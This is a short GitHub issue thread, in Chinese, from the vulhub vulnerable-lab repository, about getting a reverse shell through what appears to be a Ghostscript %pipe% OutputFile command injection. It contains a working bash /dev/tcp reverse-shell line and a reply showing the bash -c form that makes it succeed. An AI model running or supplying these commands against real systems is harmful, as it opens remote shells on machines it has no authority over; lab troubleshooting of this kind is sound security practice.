### ISSUE TITLE
弱问：touch命令可以执行，但是bash反弹shell不行

### ISSUE THREAD

**Issue by Baibing0118** [vulhub/vulhub#116]
大佬好，弱问个问题，touch命令可以执行，但是
OutputFile (%pipe%bash -i >& /dev/tcp/127.0.0.1/4444 0>&1)
反弹shell语句就是实现不了，需要编码执行？

**Comment by Baibing0118** [comment]
> 大佬好，弱问个问题，touch命令可以执行，但是
> OutputFile (%pipe%bash -i >& /dev/tcp/127.0.0.1/4444 0>&1)
> 反弹shell语句就是实现不了，需要编码执行？

**Comment by Threekiii** [comment]
改为bash -c "bash -i >& /dev/tcp/your-ip/4444 0>&1"即可成功
